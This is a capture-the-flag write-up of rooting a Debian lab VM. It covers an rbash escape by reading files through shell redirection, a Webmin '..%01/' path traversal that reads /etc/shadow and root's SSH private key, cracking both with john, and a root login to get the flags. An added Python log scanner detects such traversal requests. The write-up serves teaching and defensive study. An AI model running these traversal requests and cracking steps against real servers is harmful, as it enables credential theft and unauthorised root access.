declare -x TERM="xterm-256color"
declare -x USER="burtieo"
[email protected]:~$
 
Read/cat files :)
 
 echo "$(</etc/passwd)"
or
  printf "%s" "$(<filename)"
 
 
echo "$(</etc/passwd)"
 
[email protected]:~$  echo "$(</etc/passwd)"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
avahi-autoipd:x:107:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
burtieo:x:1000:1000:burtie,,,:/home/burtie:/bin/rbash
pdns:x:109:116:PowerDNS,,,:/var/spool/powerdns:/bin/false
mysql:x:110:117:MySQL Server,,,:/nonexistent:/bin/false
MeGustaKing:x:1001:1001::/King:/usr/sbin/rush
dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/bin/false
[email protected]:~$
 
echo "$(</etc/shadow)"
denied.
 
echo "$(</etc/*ele*)"
 
[email protected]:~$ echo "$(</etc/*ele*)"
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
 
 
[email protected]:~$ printf '%b\n' "$(</etc/group)"
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:burtie
floppy:x:25:burtie
tape:x:26:
sudo:x:27:
audio:x:29:burtie
dip:x:30:burtie
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:burtie
sasl:x:45:
plugdev:x:46:burtie
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
input:x:101:
systemd-journal:x:102:
systemd-timesync:x:103:
systemd-network:x:104:
systemd-resolve:x:105:
systemd-bus-proxy:x:106:
crontab:x:107:
netdev:x:108:burtie
Debian-exim:x:109:
messagebus:x:110:
mlocate:x:111:
ssh:x:112:
avahi-autoipd:x:113:
bluetooth:x:114:burtie
ssl-cert:x:115:
burtie:x:1000:
pdns:x:116:
mysql:x:117:
 
Lets you update your FunNotes and more!
 
echo "$(</home/bertieo/\.*)"
 
printf '%b\n' "$(<.bashrc)"
 
[email protected]:~$ printf '%b\n' "$(<.bashrc)"
-rbash: printf: missing unicode digit for \u
-rbash: printf: missing unicode digit for \u
-rbash: printf: missing unicode digit for \u
£ ~/.bashrc: executed by bash(1) for non-login shells.
£ see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
£ for examples
 
£ If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac
 
£ don't put duplicate lines or lines starting with space in the history.
£ See bash(1) for more options
HISTCONTROL=ignoreboth
 
£ append to the history file, don't overwrite it
shopt -s histappend
 
£ for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
 
£ check the window size after each command and, if necessary,
£ update the values of LINES and COLUMNS.
shopt -s checkwinsize
 
£ If set, the pattern "**" used in a pathname expansion context will
£ match all files and zero or more directories and subdirectories.
£shopt -s globstar
 
£ make less more friendly for non-text input files, see lesspipe(1)
£[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
 
£ set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi
 
£ set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color) color_prompt=yes;;
esac
 
£ uncomment for a colored prompt, if the terminal has the capability; turned
£ off by default to not distract the user: the focus in a terminal window
£ should be on the output of commands, not on the prompt
£force_color_prompt=yes
 
if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
 £ We have color support; assume it's compliant with Ecma-48
 £ (ISO/IEC-6429). (Lack of such support is extremely rare, and such
 £ a case would tend to support setf rather than setaf.)
 color_prompt=yes
    else
 color_prompt=
    fi
fi
 
if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\]\[email protected]\h\[\]:\[\]\w\[\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\[email protected]\h:\w\$ '
fi
unset color_prompt force_color_prompt
 
£ If this is an xterm set the title to [email protected]:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\]$PS1"
    ;;
*)
    ;;
esac
 
£ enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    £alias dir='dir --color=auto'
    £alias vdir='vdir --color=auto'
 
    £alias grep='grep --color=auto'
    £alias fgrep='fgrep --color=auto'
    £alias egrep='egrep --color=auto'
fi
 
£ colored GCC warnings and errors
£export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
 
£ some more ls aliases
£alias ll='ls -l'
£alias la='ls -A'
£alias l='ls -CF'
 
£ Alias definitions.
£ You may want to put all your additions into a separate file like
£ ~/.bash_aliases, instead of adding them here directly.
£ See /usr/share/doc/bash-doc/examples in the bash-doc package.
 
if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi
 
£ enable programmable completion features (you don't need to enable
£ this, if it's already enabled in /etc/bash.bashrc and /etc/profile
£ sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi
rm -rf ~/.*hist*
clear
echo "W2wC0m3 Bw3rtie0 :)"
export PATH=/usr/sbin/bin
 
 
Lets you update your FunNotes and more!
 
After trying various commands, inline scripting and for loops, name completion fails; some info had scrolled by with program names to use. One was suedoh. It does not show under the "help" command, but can be triggered with errors. I didn't save the exact output and list of commands, many of which can be seen just by typing "help".
 
So no sudo but there is, suedoh.../derp
 
suedoh -l
suedoh /usr/bin/wmstrt
 
:/home/burtie$ suedoh: unable to resolve host D0Not5top
20SecudoAGoGo R3D13? OKAY
(20-0 countdown)
D1dyaCatchaT3nK1l0
 
This opens port 10000 for webmin. However, it's only open for 20 seconds. We can make it open longer with:
 
    for i in {1..1000..1};do echo $(suedoh /usr/bin/wmstrt&);done
 
nmap -sC --script vuln -p10000 192.168.1.164
 
PORT      STATE SERVICE VERSION
10000/tcp open  http    MiniServ 0.01 (Webmin httpd)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <h1>Error - Bad Request</h1>
|_<pre>This web server is running in SSL mode. Try the URL <a href='https://192.168.1.164:10000/'>https://192.168.1.164:10000/</a> instead.<br></pre>
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|      
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <h1>Error - Bad Request</h1>
|   <pre>This web server is running in SSL mode. Try the URL <a href='https://192.168.1.164:10000/'>https://192.168.1.164:10000/</a> instead.<br></pre>
|  
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
|_http-server-header: MiniServ/0.01
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:58:A4:C4 (Oracle VirtualBox virtual NIC)
 
(Disclaimer: * That port 10000 hint was handed to me by the op during our conversations with my progress. I had completed the challenge another way, which we'll not discuss here, as it will be closed in future release)
 
Don't bother logging into webmin, you'll lock yourself out XD
 
Webmin flaw example (I looked for phpmyadmin from the nmap descriptions with luck, then found):
https://sourceforge.net/p/webadmin/bugs/3020/
 
https://192.168.1.164:10000/..%01/..%01/..%01/..%01/..%01/etc/shadow
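The interesting part of that URL, from a defender's side, is why `..%01/` works where `../` would not: a check for the literal string `../` never sees it, because a %01 control byte sits between the dots and the slash and only disappears once the server has decoded and cleaned the path. The added example below (not from the write-up, and not Webmin's code) shows that naive check beside a normalising one that percent-decodes, drops C0 control characters and then compares whole path segments, and runs both over a few constructed access-log lines; the first line mirrors the shape of the request above, the others are made up to cover plain and double-encoded variants.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines (not from the page).  The first
# mirrors the ..%01 request shape shown above; the rest are made-up variants.
SAMPLE_LOG = """\
192.168.1.66 - - [09/Apr/2017:14:02:11 +0000] "GET /unauthenticated/..%01/..%01/..%01/..%01/..%01/etc/shadow HTTP/1.1" 200 512
192.168.1.66 - - [09/Apr/2017:14:02:13 +0000] "GET /unauthenticated/../../etc/passwd HTTP/1.1" 404 162
192.168.1.66 - - [09/Apr/2017:14:02:15 +0000] "GET /images/logo.png HTTP/1.1" 200 8192
192.168.1.66 - - [09/Apr/2017:14:02:17 +0000] "GET /docs/..%252f..%252fetc%252fpasswd HTTP/1.1" 403 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def naive_traversal(raw_path: str) -> bool:
    """The check that %01 defeats: look for a literal '../' in the raw path."""
    return "../" in raw_path


def normalized_segments(raw_path: str) -> list:
    """Strip the query string, percent-decode twice (to cover double
    encoding), drop C0 control characters such as %01, then split the
    result into path segments."""
    path = raw_path.split("?", 1)[0]
    decoded = unquote(unquote(path))
    decoded = "".join(ch for ch in decoded if ord(ch) >= 0x20)
    return [seg for seg in decoded.split("/") if seg]


def is_traversal(raw_path: str) -> bool:
    """True when any segment is exactly '..' after normalisation."""
    return any(seg == ".." for seg in normalized_segments(raw_path))


def resolved_target(raw_path: str) -> str:
    """Collapse '..' against the preceding segments so an analyst can see
    which file the request was actually reaching for."""
    stack = []
    for seg in normalized_segments(raw_path):
        if seg == "..":
            if stack:
                stack.pop()
        elif seg != ".":
            stack.append(seg)
    return "/" + "/".join(stack)


def scan_log(text: str) -> list:
    """Return (raw_path, resolved_target) for every request flagged as traversal."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_traversal(m.group(1)):
            hits.append((m.group(1), resolved_target(m.group(1))))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        path = REQUEST_RE.search(line).group(1)
        print(f"naive={naive_traversal(path)!s:5} normalised={is_traversal(path)!s:5} "
              f"target={resolved_target(path) if is_traversal(path) else '-'}  {path}")
```

Against the sample lines the naive check flags only the plain `../` request, while the normalising check flags all three traversal attempts and reports the file each one resolved to (`/etc/shadow` for the first). The same normalise-then-compare-segments logic is what a file-serving handler should apply before touching the filesystem: decode first, strip control bytes, then refuse any `..` segment, rather than pattern-matching the raw string.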
 
john hash.txt --fork=25 -w=/usr/share/wordlists/rockyou.txt
 
john --show hash.txt
root:password:17260:0:99999:7:::
burtieo:Lets you update your FunNotes and more!:17257:0:99999:7:::
MeGustaKing:**********:17259:0:99999:7:::
 
 
 
https://192.168.1.164:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa.pub
https://192.168.1.164:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa < private key
 
ssh2john id_rsa.key
id_rsa.key:$ssh2$[hash omitted]*1766*0
 
ssh2john id_rsa.key > hash
john hash --fork=25 -w=/usr/share/wordlists/rockyou.txt
john --show hash
id_rsa.key:gustateamo
 
We log in with the private key; no account password is needed, just the key's passphrase:
ssh -i id_rsa.key [email protected] with password gustateamo
 
 
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# env
TERM=xterm-256color
SHELL=/bin/bash
SSH_CLIENT=192.168.1.66 57220 22
SSH_TTY=/dev/pts/1
USER=root
MAIL=/var/mail/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/root
LANG=en_GB.UTF-8
SHLVL=1
HOME=/root
LANGUAGE=en_GB:en
LOGNAME=root
SSH_CONNECTION=192.168.1.66 57220 192.168.1.164 22
_=/usr/bin/env
roo[email protected]:~# pwd
/root
[email protected]:~# ls
FL461N51D3  L45T_fl46.pl
 
 
 
[email protected]:~# cat L45T_fl46.pl
#!/usr/bin/perl -w
######################################################
#                                                    #
#  W311 D0n3                                         #
#  Y0u D1d N0t5top                                   #
#  Much0 M3Gu5t4 :D                                  #
#                                                    #
#  3mrgnc3                                           #
#                                                    #
#  Hope you had fun...                               #
#  8ut...                                            #
#                                                    #
#  p.s..                                             #
#  571ll 1 M0r3 f146 :D                              #
#                                                    #
######################################################
 
FL46_7:9tjt86evvcywuuf774hr88eui3nus8dlk
N3v3r As5um3! 1t M4k35 4n 455 0f y0u & m3 :DWS
 
 
Thanks to @3mrgnc3 for making this CTF and helping me debug some of the issues I came across. This one I felt was pretty hard; aside from the hole that will be removed in future versions, I'd not have got root without the hint for webmin. - DigiP